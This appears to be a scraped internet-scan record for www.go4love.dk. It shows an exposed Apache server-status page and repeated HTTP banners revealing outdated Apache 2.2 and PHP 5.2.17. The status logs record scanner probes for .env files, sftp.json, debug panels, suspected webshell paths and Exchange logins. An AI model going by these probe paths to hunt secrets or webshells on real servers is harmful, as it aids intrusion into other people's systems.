SSReqConnChildSlotClientVHostRequest 0-8521330/11/759W 0.01000.00.001.80 206.189.2.13webhotel5.webhosting.dkGET /server-status HTTP/1.0 1-8521190/12/763_ 0.014300.00.001.79 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-8521160/14/758_ 0.004720.00.001.77 172.71.218.252webhotel5.webhosting.dkGET / HTTP/1.0 3-8521170/12/757_ 0.014210.00.002.56 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-8521180/12/757_ 0.014700.00.001.32 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/SimplePie/index.php HTTP/1.0 5-8521200/12/755_ 0.013900.00.001.09 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/sitemaps/index.php HTTP/1.0 6-8521210/12/752_ 0.023100.00.011.85 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-8521220/12/749_ 0.012700.00.001.22 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-8521230/12/749_ 0.012600.00.001.39 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/style-engine/index.php HTTP/1.0 9-8521240/12/748_ 0.01500.00.021.78 81.19.232.105webhotel5.webhosting.dkt.php?u=https://xnxxcom.club/se/?query%3Drprvega%20xxx HTTP/1.0 10-8521250/12/747_ 0.01020.00.001.74 206.189.2.13webhotel5.webhosting.dkGET / HTTP/1.0 11-8521260/12/746_ 0.011700.00.001.75 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/widgets/index.php HTTP/1.0 12-8521270/12/745_ 0.01000.00.002.16 206.189.2.13webhotel5.webhosting.dkGET /server HTTP/1.0 13-8521440/11/744_ 0.013000.00.002.32 51.222.253.11webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 14-8521280/11/704_ 0.01000.00.001.67 206.189.2.13webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 15-8521340/11/740_ 0.015100.00.011.61 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/Requests/index.php HTTP/1.0 16-8521450/10/739_ 0.015800.00.001.86 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-8521290/11/740_ 0.00000.00.002.06 206.189.2.13webhotel5.webhosting.dkGET /about HTTP/1.0 18-8521300/12/738_ 0.01000.00.003.53 206.189.2.13webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 19-8521310/12/738_ 0.01000.00.002.48 206.189.2.13webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 20-8521490/10/729_ 0.01020.00.002.94 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 21-8521320/12/732_ 0.02000.00.001.91 206.189.2.13webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 22-8521500/9/674_ 0.024710.00.001.52 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 23-8521750/9/666_ 0.004000.00.001.51 185.231.113.38webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 24-8521770/9/658_ 0.013100.00.001.31 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/sodium_compat/index.php HTTP/1.0 25-8521970/9/618_ 0.012200.00.082.22 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/theme-compat/index.php HTTP/1.0 26-8522010/9/629_ 0.011740.00.001.12 198.235.24.173webhotel5.webhosting.dkGET / HTTP/1.0 27-8522380/9/616_ 0.011100.00.001.92 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-8522390/9/614_ 0.01020.00.001.44 206.189.2.13webhotel5.webhosting.dkGET / HTTP/1.0 29-8614210/1/609_ 0.002410.00.001.84 146.70.96.73webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 30-7-0/0/569. 0.0852800.00.001.30 85.203.205.124webhotel5.webhosting.dkGET /metodeogteknik/macgenealogi.html HTTP/1.0 31-7-0/0/492. 0.0652250.00.001.13 81.19.232.105www.karenborup.dkGET /favicon.ico HTTP/1.0 32-7-0/0/445. 0.0651900.00.001.30 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-7-0/0/485. 0.0851100.00.001.36 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 34-7-0/0/357. 0.06215900.00.000.92 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-7-0/0/309. 0.1052800.00.000.22 85.203.205.124webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 36-7-0/0/355. 0.0753200.00.000.32 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 37-7-0/0/152. 0.0851700.00.000.33 52.230.152.70webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 38-8521150/16/169_ 0.015500.00.010.32 91.92.254.72webhotel5.webhosting.dkGET /wp-includes/random_compat/index.php HTTP/1.0 39-0-0/0/50. 0.062729500.00.000.01 81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 40-0-0/0/50. 0.062729600.00.000.01 81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 41-0-0/0/50. 0.062729400.00.000.01 81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 42-0-0/0/50. 0.062729300.00.000.02 81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde32b1d2828
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 31-May-2024 11:22:03 CEST Restart Time: Friday, 31-May-2024 04:00:07 CEST Parent Server Generation: 7 Server uptime: 7 hours 21 minutes 55 seconds Total accesses: 29484 - Total Traffic: 22.6 MB CPU Usage: u3.64 s1.99 cu0 cs0 - .0212% CPU load 1.11 requests/sec - 894 B/second - 804 B/request 1 requests currently being processed, 31 idle workers ___________________________W____................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-744960/38/863_ 0.11010.00.010.42 159.89.17.243webhotel5.webhosting.dkGET /about HTTP/1.0 1-744970/33/863_ 0.08050.00.010.34 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 2-744980/35/860_ 0.09010.00.030.39 159.89.17.243webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 3-744990/35/861_ 0.11000.00.120.51 159.89.17.243webhotel5.webhosting.dkGET /server HTTP/1.0 4-745000/34/860_ 0.08070.00.010.48 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 5-745010/34/858_ 0.116110.00.010.61 159.89.172.232webhotel5.webhosting.dkPOST / HTTP/1.0 6-745020/34/851_ 0.08050.00.010.36 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 7-745030/34/848_ 0.101100.00.010.31 185.220.101.3webhotel5.webhosting.dkGET /admin HTTP/1.0 8-745050/34/850_ 0.09100.00.010.31 159.89.172.232webhotel5.webhosting.dkGET /core/.env HTTP/1.0 9-745060/34/848_ 0.0721210.00.030.34 54.36.149.32webhotel5.webhosting.dkGET / HTTP/1.0 10-745070/34/846_ 0.11600.00.011.25 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-745080/34/843_ 0.09080.00.010.45 46.101.111.185webhotel5.webhosting.dkGET / HTTP/1.0 12-745110/34/843_ 0.07050.00.020.40 159.89.17.243webhotel5.webhosting.dkGET / HTTP/1.0 13-745120/34/808_ 0.09070.00.012.30 46.101.111.185webhotel5.webhosting.dkGET / HTTP/1.0 14-745130/34/797_ 0.09010.00.020.43 46.101.111.185webhotel5.webhosting.dkGET /server HTTP/1.0 15-745140/34/846_ 0.08000.00.100.86 88.216.2.82webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 16-745150/34/797_ 0.100120.00.020.43 159.89.17.243webhotel5.webhosting.dkGET / HTTP/1.0 17-745160/34/757_ 0.11010.00.060.35 46.101.111.185webhotel5.webhosting.dkGET /about HTTP/1.0 18-745170/34/808_ 0.09020.00.290.68 46.101.111.185webhotel5.webhosting.dkGET /server-status HTTP/1.0 19-745180/34/796_ 0.09010.00.010.34 46.101.111.185webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 20-745400/34/765_ 0.09000.00.020.48 159.89.17.243webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 21-745530/34/821_ 0.11000.00.020.49 46.101.111.185webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 22-745720/34/799_ 0.09000.00.020.34 159.89.17.243webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 23-745840/33/822_ 0.08010.00.120.83 46.101.111.185webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 24-745950/34/790_ 0.09010.02.162.60 46.101.111.185webhotel5.webhosting.dkGET /login.action HTTP/1.0 25-746120/34/749_ 0.06000.00.020.41 159.89.17.243webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 26-746330/34/721_ 0.08000.00.060.33 46.101.111.185webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 27-746390/33/705W 0.06000.00.010.29 159.89.17.243webhotel5.webhosting.dkGET /server-status HTTP/1.0 28-746750/33/590_ 0.081010.00.010.35 159.89.172.232webhotel5.webhosting.dkGET /.env HTTP/1.0 29-747050/33/590_ 0.10900.00.010.24 107.189.8.226webhotel5.webhosting.dkGET /admin/ HTTP/1.0 30-755750/33/537_ 0.08010.00.030.28 46.101.111.185webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 31-7148610/13/504_ 0.03400.00.020.24 51.222.253.15webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 32-6-0/0/497. 0.11131700.00.000.22 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 33-6-0/0/446. 0.10131700.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-6-0/0/605. 0.11131700.00.000.30 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-6-0/0/555. 0.11131700.00.000.43 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-6-0/0/455. 0.12131700.00.000.21 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-6-0/0/415. 0.10365600.00.000.31 193.176.211.234webhotel5.webhosting.dkGET /wp-content/plugins/woo-maxicashgateway_woo2-82/ HTTP/1.0 38-6-0/0/208. 0.11365610.00.000.14 216.244.66.239webhotel5.webhosting.dkt&publicationName=temp&issueName=Issue_21_2020&page=24 HTTP/1.0 39-5-0/0/158. 0.09503430.00.000.19 58.96.90.182www.lillekrabbe.dkGET /lab/dollmaker/converse1green.gif HTTP/1.0 40-5-0/0/50. 0.09504500.00.000.94 193.176.211.249webhotel5.webhosting.dkGET /wp-admin/maint/wp-conflg.php HTTP/1.0 41-5-0/0/50. 0.09504700.00.000.28 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/SimplePie/admin.php HTTP/1.0 42-5-0/0/50. 0.11504800.00.000.01 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/blogs.php HTTP/1.0 43-5-0/0/50. 0.09504500.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/Text/Diff/Engine/cache.php HTTP/1.0 44-5-0/0/50. 0.09504410.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/customize/install.php HTTP/1.0 45-5-0/0/50. 0.11504400.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-content/backup.php HTTP/1.0 46-5-0/0/50. 0.10504210.00.000.02 193.176.211.249webhotel5.webhosting.dkGET /wp-content/uploads/2023/03/paok.php HTTP/1.0 47-5-0/0/50. 0.11504300.00.000.07 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/ID3/readme.php HTTP/1.0 48-5-0/0/50. 0.10504100.00.000.26 193.176.211.249webhotel5.webhosting.dkGET /wp-content/uploads/2016/ss36.php HTTP/1.0 49-5-0/0/50. 0.08504010.00.000.02 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 50-5-0/0/50. 0.09503900.00.000.01 193.176.211.249webhotel5.webhosting.dkGET /wp-includes/SimplePie/Enclosure-class.php HTTP/1.0 51-5-
Open service 81.19.232.105:443 · www.go4love.dk
2024-11-20 23:29
HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 23:29:28 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-11-20 22:54
HTTP/1.1 301 Moved Permanently Date: Wed, 20 Nov 2024 22:54:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NxE76E3fFAZDXJjUPvx%2F%2FDwizZ46d3CQh0iaj%2FCW%2BkyN9%2F3V1eL94Bhst6EtxxI8tqY8S7Hc94bA0A%2BzreGqVN0OyTG92%2BmYXRzH0tO5DrcynBsxm1KP6OtYMQs01ifl%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5c05ffddf6665c-AMS alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=993&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3094&recv_bytes=560&delivery_rate=4459958&cwnd=251&unsent_bytes=0&cid=044df3a28ad02493&ts=150&x=0"
Open service 81.19.232.105:80 · www.go4love.dk
2024-11-20 18:10
HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 18:10:54 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:80 · www.go4love.dk
2024-11-18 19:30
HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 19:30:37 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:443 · www.go4love.dk
2024-11-18 14:12
HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 14:12:36 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-11-18 10:16
HTTP/1.1 301 Moved Permanently Date: Mon, 18 Nov 2024 10:16:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVZdF2LoycuIU%2BHvPYPmbeQqiHR5Nrht4xbXbJKXiVIekNHUuMzPRcScp7StT%2FOarVTbMEdcHFsczrbCWwlNT%2BxI8534KcKh1TcudRK3wZZ2gd71E3ZfRT3EZY0uRJ%2Bwmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4735026ebb2a6a-CDG alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10037&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3092&recv_bytes=560&delivery_rate=432540&cwnd=241&unsent_bytes=0&cid=66c730806db56e3d&ts=218&x=0"
Open service 81.19.232.105:80 · www.go4love.dk
2024-11-16 18:26
HTTP/1.1 200 OK Date: Sat, 16 Nov 2024 18:24:13 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-11-16 16:08
HTTP/1.1 301 Moved Permanently Date: Sat, 16 Nov 2024 16:08:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C4QvtymRFYmjZ2AyVlEztMVxWmKIWH0qUEVjNeg5uUEJH0vWX5qRed2b4t3lB9W7lBzXvjVwIeA9NqIKWRH9Z%2F06WkjjXOGt6IR7xL2yF%2B4r%2BAN3KzU5yKUJ%2BaDIOAUqvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e38bd994dff0963-HKG alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=186384&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3092&recv_bytes=560&delivery_rate=23298&cwnd=33&unsent_bytes=0&cid=950f2a14577f6149&ts=712&x=0"
Open service 81.19.232.105:443 · www.go4love.dk
2024-11-16 14:25
HTTP/1.1 200 OK Date: Sat, 16 Nov 2024 14:22:56 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:80 · www.go4love.dk
2024-11-02 16:44
HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:44:13 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:443 · www.go4love.dk
2024-11-02 11:49
HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 11:49:45 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.4 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-11-02 09:43
HTTP/1.1 301 Moved Permanently Date: Sat, 02 Nov 2024 09:43:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCGYDVXAXNUZcf5c3Lj7pLH3CZY0TsfzS44sDuh7BlbLdXFTrWYhRLLJO8XiyuOMc1ybVDs93JHi2gDQleIVUlBFGCgZyrJO00sgRr8oBjw68Y4oXxFVZcoPv1GztAquZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc32e8d290a91ea-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3091&recv_bytes=560&delivery_rate=6445103&cwnd=249&unsent_bytes=0&cid=961a93fd5e7f12fc&ts=210&x=0"
Open service 188.114.97.3:443 · www.go4love.dk
2024-11-01 23:00
HTTP/1.1 301 Moved Permanently Date: Fri, 01 Nov 2024 23:00:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YT46nxmKx%2FP%2FXviGW1qHGjkFTaPEgwUud%2FeKq5lwP7zbuMatniw88Hy6fCyX9vC8XYp3I9Rfhakq32ql57Lu6bIlpMe07NZLA%2B6jM1YjJXoYOLVt40zvGvC95PT5fa6kbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbf80896a12ad80-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3094&recv_bytes=560&delivery_rate=7715808&cwnd=251&unsent_bytes=0&cid=947c93b01e3f16f2&ts=711&x=0"
Open service 81.19.232.105:80 · www.go4love.dk
2024-11-01 12:05
HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 12:05:20 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:443 · www.go4love.dk
2024-11-01 06:17
